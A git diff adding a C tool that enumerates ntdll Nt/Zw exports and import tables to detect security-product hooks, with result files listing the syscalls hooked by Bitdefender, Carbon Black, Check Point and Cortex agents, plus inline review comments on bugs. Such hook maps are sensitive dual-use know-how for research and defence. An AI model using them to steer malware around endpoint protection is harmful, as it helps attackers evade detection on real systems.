diff --git a/enum/hookchain_finder64.c b/enum/hookchain_finder64.c
new file mode 100644
index 0000000..baea1d1
--- /dev/null
+++ b/enum/hookchain_finder64.c
@@ -0,0 +1,339 @@
+// HookChain: Hook Finder
+// Compiling gcc .\hookchain_finder64.c -o .\hookchain_finder64.exe
+//
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#pragma comment (lib, "dbghelp.lib")
+
+#define MAX_NAME 255
+#define MAX_ENTRIES 1024
+
+typedef struct _ENTRY_INFO {
+ PVOID Address;
+ PCHAR Name;
+ BOOL IsHooked;
+} ENTRY_INFO, * PENTRY_INFO;
+
+typedef struct _NT_LIST
+{
+ long Count;
+ ENTRY_INFO Entries[MAX_ENTRIES];
+} NT_LIST, * PNT_LIST;
+
+static NT_LIST NtlList;
+
+BOOL FillNtList();
+VOID CheckDll(CHAR *name, HANDLE baseAddress);
+VOID DumpListOfHookedDlls();
+BOOL CheckHook(CHAR *callerName, CHAR *libraryName, CHAR *functionName, DWORD64 functionAddress);
+VOID ListLoadedDlls();
+
+typedef struct _CPEB {
+ BOOLEAN InheritedAddressSpace;
+ BOOLEAN ReadImageFileExecOptions;
+ BOOLEAN BeingDebugged;
+ BOOLEAN Spare;
+ HANDLE Mutant;
+ PVOID ImageBase;
+ PPEB_LDR_DATA LoaderData;
+ PVOID ProcessParameters;
+ PVOID SubSystemData;
+ PVOID ProcessHeap;
+ PVOID FastPebLock;
+ PVOID FastPebLockRoutine;
+ PVOID FastPebUnlockRoutine;
+ ULONG EnvironmentUpdateCount;
+ PVOID* KernelCallbackTable;
+ PVOID EventLogSection;
+ PVOID EventLog;
+ PVOID FreeList;
+ ULONG TlsExpansionCounter;
+ PVOID TlsBitmap;
+ ULONG TlsBitmapBits[0x2];
+ PVOID ReadOnlySharedMemoryBase;
+ PVOID ReadOnlySharedMemoryHeap;
+ PVOID* ReadOnlyStaticServerData;
+ PVOID AnsiCodePageData;
+ PVOID OemCodePageData;
+ PVOID UnicodeCaseTableData;
+ ULONG NumberOfProcessors;
+ ULONG NtGlobalFlag;
+ BYTE Spare2[0x4];
+ LARGE_INTEGER CriticalSectionTimeout;
+ ULONG HeapSegmentReserve;
+ ULONG HeapSegmentCommit;
+ ULONG HeapDeCommitTotalFreeThreshold;
+ ULONG HeapDeCommitFreeBlockThreshold;
+ ULONG NumberOfHeaps;
+ ULONG MaximumNumberOfHeaps;
+ PVOID** ProcessHeaps;
+ PVOID GdiSharedHandleTable;
+ PVOID ProcessStarterHelper;
+ PVOID GdiDCAttributeList;
+ PVOID LoaderLock;
+ ULONG OSMajorVersion;
+ ULONG OSMinorVersion;
+ ULONG OSBuildNumber;
+ ULONG OSPlatformId;
+ ULONG ImageSubSystem;
+ ULONG ImageSubSystemMajorVersion;
+ ULONG ImageSubSystemMinorVersion;
+ ULONG GdiHandleBuffer[0x22];
+ ULONG PostProcessInitRoutine;
+ ULONG TlsExpansionBitmap;
+ BYTE TlsExpansionBitmapBits[0x80];
+ ULONG SessionId;
+} CPEB, * PCPEB;
+
+BOOL FillNtList() {
+
+ printf("[+] Listing ntdll Nt/Zw functions\n------------------------------------------\n");
+
+ PTEB pCurrentTeb;
+ PCPEB pCurrentPeb;
+
+ PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+
+ PVOID pBase;
+
+#if _WIN64
+ pCurrentTeb = (PTEB)__readgsqword(0x30);
+#else
+ pCurrentTeb = (PTEB)__readfsdword(0x16);
+#endif
+
+ pCurrentPeb = (PCPEB)pCurrentTeb->ProcessEnvironmentBlock;
+
+ if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0x0a)
+ return FALSE;
+
+ pImageExportDirectory = NULL;
+ pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+
+ pBase = pLdrDataEntry->DllBase;
+
+ pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return FALSE;
+
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return FALSE;
+
+ pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(
+ (PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress
+ );
+
+ PDWORD pdwFunctions;
+ PDWORD pdwNames;
+ PWORD pwNameOrdinals;
+
+ PDWORD pcName = NULL;
+ PVOID pAddress = NULL;
+
+ pdwFunctions = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfFunctions);
+ pdwNames = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNames);
+ pwNameOrdinals = (PWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNameOrdinals);
+
+ PENTRY_INFO Entries = NtlList.Entries;
+ DWORD idx = 0;
+
+ for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+ pcName = (PDWORD)((PBYTE)pBase + pdwNames[i]);
+ pAddress = (PBYTE)pBase + pdwFunctions[pwNameOrdinals[i]];
+
+ if ((*(USHORT*)pcName != 'tN') && (*(USHORT*)pcName != 'wZ'))
+ continue;
+
+ BOOLEAN dupFound = FALSE;
+ for (DWORD id = 0; id < idx; id++)
+ {
+ if ((DWORD64)Entries[id].Address == (DWORD64)pAddress)
+ dupFound = TRUE;
+ }
+
+ if (dupFound)
+ continue;
+
+ Entries[idx].Address = pAddress;
+ Entries[idx].Name = (PCHAR)pcName;
+ Entries[idx].IsHooked = FALSE;
+ if (*((PBYTE)pAddress) == 0xe9 || *((PBYTE)pAddress + 3) == 0xe9) Entries[idx].IsHooked = TRUE;
+
+ if (Entries[idx].IsHooked) printf("%s is hooked\n", pcName);
+
+ printf(" ntdll[%d] %s 0x%p\n", idx, pcName, pAddress);
+
+ idx++;
+ if (idx == MAX_ENTRIES) break;
+ }
+
+ // Save total number of system calls found.
+ NtlList.Count = idx;
+
+ printf("Mapped %d functions\n\n", NtlList.Count);
+
+ return TRUE;
+}
+
+VOID CheckDll(CHAR *name, HANDLE imageBase) {
+
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = NULL;
+ HMODULE library = NULL;
+ LPCSTR libraryName = NULL;
+
+ pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return;
+
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return;
+
+ pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
+
+ while (pImportDescriptor->Name != 0x00) {
+
+ //Get name of the DLL in the Import Table
+ libraryName = (LPCSTR)((PBYTE)imageBase + pImportDescriptor->Name);
+ if ((libraryName) && (_stricmp(libraryName, "ntdll.dll") == 0)) {
+ library = GetModuleHandleA(libraryName);
+ if (library) {
+
+ DWORD cnt = 0;
+
+ printf("Checking %s at %s IAT\n", libraryName, name);
+
+ //Get Import Lookup Table (OriginalFirstThunk) and Import Address Table (FirstThunk)
+ PIMAGE_THUNK_DATA originalFirstThunk = NULL, firstThunk = NULL;
+
+ firstThunk = (PIMAGE_THUNK_DATA) ((PBYTE) imageBase + pImportDescriptor->FirstThunk);
+ originalFirstThunk = (PIMAGE_THUNK_DATA) ((PBYTE) imageBase + pImportDescriptor->OriginalFirstThunk);
+ PIMAGE_IMPORT_BY_NAME function = NULL;
+
+ while ((originalFirstThunk->u1.AddressOfData != NULL) && ((originalFirstThunk->u1.AddressOfData & 0xffffffffffff) >= 0x1000)){
+
+ function = (PIMAGE_IMPORT_BY_NAME)((PBYTE)imageBase + originalFirstThunk->u1.AddressOfData);
+
+ if (CheckHook(name, (char *)libraryName, function->Name, (DWORD64)firstThunk->u1.Function)) cnt++;
+
+ ++originalFirstThunk;
+ ++firstThunk;
+
+ }
+
+ printf(" +-- %d hooked functions.\n\n", cnt);
+
+ }
+ }
+ pImportDescriptor++;
+ }
+}
+
+BOOL CheckHook(CHAR *callerName, CHAR *libraryName, CHAR *functionName, DWORD64 functionAddress) {
+
+ BOOL hooked = FALSE;
+ char * ntHoked = "";
+
+ PENTRY_INFO Entries = NtlList.Entries;
+ for (DWORD i = 0; i < NtlList.Count - 1; i++)
+ {
+ if (_stricmp(functionName, Entries[i].Name) == 0)
+ printf("%s %s 0x%p, 0x%p\n", functionName, Entries[i].Name, (DWORD64)Entries[i].Address, functionAddress);
+
+ if ((_stricmp(functionName, Entries[i].Name) == 0) && (strlen(functionName) == strlen(Entries[i].Name)) && ((DWORD64)Entries[i].Address != functionAddress))
+ {
+ hooked = TRUE;
+ if (Entries[i].IsHooked) ntHoked = "*";
+ break;
+ }
+ }
+
+ if (hooked) printf(" |-- %s IAT to %s of function %s%s is hooked to 0x%p\n", callerName, libraryName, ntHoked, functionName, functionAddress);
+
+ return hooked;
+}
+
+VOID DumpListOfHookedDlls() {
+ HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0);
+ MODULEENTRY32 me32;
+ me32.dwSize = sizeof(MODULEENTRY32);
+
+ printf("[+] Listing hooked modules\n------------------------------------------\n");
+ if(Module32First(hSnap, &me32)) {
+ do {
+ //printf("%s is loaded at 0x%p.\n", me32.szExePath, me32.modBaseAddr);
+ CheckDll((CHAR *)&me32.szModule, me32.modBaseAddr);
+
+ } while(Module32Next(hSnap, &me32));
+ }
+
+ CloseHandle(hSnap);
+}
+
+VOID ListLoadedDlls() {
+ HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0);
+ MODULEENTRY32 me32;
+ me32.dwSize = sizeof(MODULEENTRY32);
+
+ printf("[+] Listing loaded modules\n------------------------------------------\n");
+ if(Module32First(hSnap, &me32)) {
+ do {
+ printf("%s is loaded at 0x%p.\n", me32.szExePath, me32.modBaseAddr);
+
+ } while(Module32Next(hSnap, &me32));
+ }
+
+ printf("\n");
+ CloseHandle(hSnap);
+}
+
+int main (int argc, char **argv) {
+ printf("HookChainFinder M4v3r1ck by Sec4US Team\n\n");
+
+ if (!FillNtList()) {
+ printf("[-] Error getting NT... list\n");
+ ExitProcess(1);
+ }
+
+printf("[*] Press enter to continue..."); getchar();
+
+ if ( argc > 1 ) {
+ CHAR *dll = argv[1];
+ HANDLE hDll = LoadLibrary(dll);
+
+ printf("[+] Loading DLL %s\n------------------------------------------\n", dll);
+ if(hDll == NULL) {
+ printf("[-] Error loading DLL\n\n");
+ }else{
+ printf("%s is loaded at 0x%p.\n\n", dll, hDll);
+ }
+ CloseHandle(hDll);
+ }
+
+ ListLoadedDlls();
+
+ DumpListOfHookedDlls();
+
+ printf("------------------------------------------\nCompleted\n");
+
+ return 0;
+}
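Review bot: `CheckDll` dereferences the import directory without checking that it exists: for a module whose `DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress` is 0 (ntdll.dll itself has no import table) `pImportDescriptor` becomes `imageBase`, and the `while (pImportDescriptor->Name != 0x00)` loop then walks the DOS header as if it were a descriptor table, so `DumpListOfHookedDlls` can read out of bounds on every run; guard it with `DWORD importRva = pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; if (importRva == 0) return;` before the cast. In `CheckHook`, `for (DWORD i = 0; i < NtlList.Count - 1; i++)` skips the last recorded export, and because `Count` is a signed `long` compared against an unsigned `DWORD`, a `Count` of 0 makes the bound wrap to 0xFFFFFFFF and the loop run past `Entries`; `i < (DWORD)NtlList.Count` is what was intended. The 32-bit branch of `FillNtList` reads the TEB self-pointer with `__readfsdword(0x16)`, but the NT_TIB `Self` field is at fs:[0x18], so that path cannot work as written (the x64 read at gs:[0x30] is correct). In `main`, `CloseHandle(hDll)` is applied to an HMODULE, which is not a kernel handle, and the enumeration that follows relies on the DLL staying loaded, so the call should be dropped (or replaced by `FreeLibrary(hDll)` after `DumpListOfHookedDlls`). The `0xe9` test in `FillNtList` only recognises a `jmp rel32` at offset 0 or 3 of the export stub, so a comment such as `// heuristic: detects only a jmp rel32 at the stub's first or fourth byte; other trampoline layouts are not reported` would help readers interpret the "is hooked" lines in the result files.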
diff --git a/enum/hookchain_finder64.exe b/enum/hookchain_finder64.exe
new file mode 100644
index 0000000..f479aa0
Binary files /dev/null and b/enum/hookchain_finder64.exe differ
diff --git a/enum/results_enum/Result.xlsx b/enum/results_enum/Result.xlsx
new file mode 100644
index 0000000..8c4a141
Binary files /dev/null and b/enum/results_enum/Result.xlsx differ
diff --git a/enum/results_enum/bitdefender.txt b/enum/results_enum/bitdefender.txt
new file mode 100644
index 0000000..b83d905
--- /dev/null
+++ b/enum/results_enum/bitdefender.txt
@@ -0,0 +1,77 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAdjustPrivilegesToken is hooked
+NtAlpcConnectPort is hooked
+NtAlpcCreatePort is hooked
+NtAlpcSendWaitReceivePort is hooked
+NtClose is hooked
+NtCommitTransaction is hooked
+NtCreateMutant is hooked
+NtCreateProcess is hooked
+NtCreateProcessEx is hooked
+NtCreateSection is hooked
+NtCreateSectionEx is hooked
+NtCreateSymbolicLinkObject is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtCreateTransaction is hooked
+NtCreateUserProcess is hooked
+NtDuplicateObject is hooked
+NtLoadDriver is hooked
+NtMapViewOfSection is hooked
+NtMapViewOfSectionEx is hooked
+NtOpenProcess is hooked
+NtQueryInformationProcess is hooked
+NtQuerySystemEnvironmentValueEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtRaiseHardError is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtRollbackTransaction is hooked
+NtSetContextThread is hooked
+NtSetInformationThread is hooked
+NtSetInformationTransaction is hooked
+NtSetSystemEnvironmentValueEx is hooked
+NtShutdownSystem is hooked
+NtSuspendThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtWriteFile is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff736e80000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8657d0000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff865590000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8632e0000.
+C:\Program Files\Bitdefender\Bitdefender Security\bdhkm\dlls_266633813365032704\bdhkm64.dll is loaded at 0x00007ff83fc20000.
+C:\Program Files\Bitdefender\Bitdefender Security\atcuf\dlls_266722497920000000\atcuf64.dll is loaded at 0x00007ff83f9e0000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8606c0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff864ae0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at bdhkm64.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at atcuf64.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/carbonblack.txt b/enum/results_enum/carbonblack.txt
new file mode 100644
index 0000000..6a0b08d
--- /dev/null
+++ b/enum/results_enum/carbonblack.txt
@@ -0,0 +1,108 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAllocateVirtualMemory is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtMapViewOfSection is hooked
+NtOpenProcess is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationProcess is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtReadVirtualMemory is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7785a0000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ff836030000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ff8344d0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ff8338b0000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff82f9c0000.
+C:\Windows\system32\ctiuser.dll is loaded at 0x00007ff828060000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff834f40000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ff834650000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ff8355e0000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ff835380000.
+C:\Windows\System32\bcrypt.dll is loaded at 0x00007ff833ed0000.
+C:\Windows\system32\FLTLIB.DLL is loaded at 0x00007ff824640000.
+C:\Windows\System32\ucrtbase.dll is loaded at 0x00007ff833c20000.
+C:\Program Files\Immidio\Flex Profiles\FlexHook64.dll is loaded at 0x00000000689e0000.
+C:\Windows\System32\USER32.dll is loaded at 0x00007ff8348f0000.
+C:\Windows\System32\win32u.dll is loaded at 0x00007ff8336e0000.
+C:\Windows\System32\GDI32.dll is loaded at 0x00007ff834710000.
+C:\Windows\System32\gdi32full.dll is loaded at 0x00007ff833db0000.
+C:\Windows\System32\msvcp_win.dll is loaded at 0x00007ff833710000.
+C:\Windows\System32\SHELL32.dll is loaded at 0x00007ff835700000.
+C:\Windows\System32\SHLWAPI.dll is loaded at 0x00007ff834a90000.
+C:\Windows\SYSTEM32\USERENV.dll is loaded at 0x00007ff833590000.
+C:\Windows\System32\IMM32.DLL is loaded at 0x00007ff834e50000.
+C:\Windows\SYSTEM32\ntmarta.dll is loaded at 0x00007ff8327b0000.
+C:\Windows\system32\vmwsci.dll is loaded at 0x00007ff8334e0000.
+C:\Windows\System32\PSAPI.DLL is loaded at 0x00007ff834640000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ctiuser.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ADVAPI32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at sechost.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at RPCRT4.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at bcrypt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at FLTLIB.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at USER32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at GDI32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at gdi32full.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at SHELL32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at SHLWAPI.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at USERENV.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at IMM32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ntmarta.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at PSAPI.DLL IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
diff --git a/enum/results_enum/checkpoint.txt b/enum/results_enum/checkpoint.txt
new file mode 100644
index 0000000..2ec860f
--- /dev/null
+++ b/enum/results_enum/checkpoint.txt
@@ -0,0 +1,165 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAdjustPrivilegesToken is hooked
+NtAllocateVirtualMemory is hooked
+NtCreateEvent is hooked
+NtCreateMutant is hooked
+NtCreateSemaphore is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtDuplicateObject is hooked
+NtDuplicateToken is hooked
+NtFreeVirtualMemory is hooked
+NtMapViewOfSection is hooked
+NtOpenEvent is hooked
+NtOpenMutant is hooked
+NtOpenProcessToken is hooked
+NtOpenSemaphore is hooked
+NtProtectVirtualMemory is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemInformationEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtReadVirtualMemory is hooked
+NtResumeProcess is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtSuspendProcess is hooked
+NtSuspendThread is hooked
+NtTerminateProcess is hooked
+NtTerminateThread is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 476 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hook\hookchain_finder64.exe is loaded at 0x00007ff6aa0d0000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffaad0d0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffaac5f0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffaaa9b0000.
+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\SBA_ISWWH.dll is loaded at 0x0000000078c90000.
+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\cphnt64.dll is loaded at 0x00007ffa56f10000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ffaa7820000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffaac7f0000.
+C:\Program Files\NDDigital\nddPrint\Agent\nddPrint.Agent.SpoolMonitor64.dll is loaded at 0x00007ffa9f1d0000.
+C:\Windows\System32\WS2_32.dll is loaded at 0x00007ffaabdf0000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ffaacb10000.
+C:\Windows\System32\USER32.dll is loaded at 0x00007ffaac390000.
+C:\Windows\System32\win32u.dll is loaded at 0x00007ffaaa950000.
+C:\Windows\System32\GDI32.dll is loaded at 0x0000018f838c0000.
+C:\Windows\System32\gdi32full.dll is loaded at 0x00007ffaaa7b0000.
+C:\Windows\System32\msvcp_win.dll is loaded at 0x00007ffaaafe0000.
+C:\Windows\System32\ucrtbase.dll is loaded at 0x00007ffaaaee0000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ffaac6b0000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ffaac970000.
+C:\Windows\System32\SHELL32.dll is loaded at 0x00007ffaab110000.
+C:\Windows\SYSTEM32\Secur32.dll is loaded at 0x00007ffaa2640000.
+C:\Windows\SYSTEM32\nddigital.log4cxx.dll is loaded at 0x0000000180000000.
+C:\Windows\SYSTEM32\WINSPOOL.DRV is loaded at 0x00007ffa98e80000.
+C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_08e1c10da83fbc83\MSVCP90.dll is loaded at 0x0000000050bb0000.
+C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_08e1c10da83fbc83\MSVCR90.dll is loaded at 0x0000000050b00000.
+C:\Windows\SYSTEM32\ODBC32.dll is loaded at 0x00007ffa991a0000.
+C:\Windows\System32\CRYPT32.dll is loaded at 0x00007ffaaac80000.
+C:\Windows\SYSTEM32\SSPICLI.DLL is loaded at 0x00007ffaaa670000.
+C:\Windows\SYSTEM32\DPAPI.DLL is loaded at 0x00007ffaaa4e0000.
+C:\Windows\System32\IMM32.DLL is loaded at 0x00007ffaab0e0000.
+C:\Windows\SYSTEM32\windows.storage.dll is loaded at 0x00007ffaa8780000.
+C:\Windows\System32\combase.dll is loaded at 0x00007ffaab910000.
+C:\Windows\SYSTEM32\Wldp.dll is loaded at 0x00007ffaaa130000.
+C:\Windows\System32\SHCORE.dll is loaded at 0x00007ffaabe60000.
+C:\Windows\System32\shlwapi.dll is loaded at 0x00007ffaaca90000.
+C:\Windows\SYSTEM32\ntmarta.dll is loaded at 0x00007ffaa9030000.
+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\cphusr64.dll is loaded at 0x00007ffa88520000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at SBA_ISWWH.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at cphnt64.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at WS2_32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at RPCRT4.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at USER32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at GDI32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at gdi32full.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ADVAPI32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at sechost.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at SHELL32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at Secur32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at WINSPOOL.DRV IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ODBC32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at CRYPT32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at SSPICLI.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at DPAPI.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at IMM32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at windows.storage.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at combase.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at Wldp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at SHCORE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at shlwapi.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ntmarta.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at cphusr64.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
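Review bot: The result file records no OS build, Check Point agent version or capture date, so the hook list at the top cannot be compared with the sibling files — "Mapped 476 functions" here against 478 and 491 elsewhere already implies different ntdll builds. A one-line header at the top of each results file, e.g. `# host: Windows <build> | agent: Check Point Endpoint Security <version> | captured: <date>`, would make the comparison meaningful. The module list also exposes the capturing user's profile path and unrelated third-party DLLs (nddPrint.Agent.SpoolMonitor64.dll, nddigital.log4cxx.dll), which suggests a production host; consider redacting the username and noting which non-EDR modules were present, since the Nt/Zw section does not attribute a hook to the module that placed it.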
diff --git a/enum/results_enum/cortex.txt b/enum/results_enum/cortex.txt
new file mode 100644
index 0000000..79832dd
--- /dev/null
+++ b/enum/results_enum/cortex.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff666a00000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8a6130000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff8a5e90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8a5b90000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8a0fd0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff8a4130000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
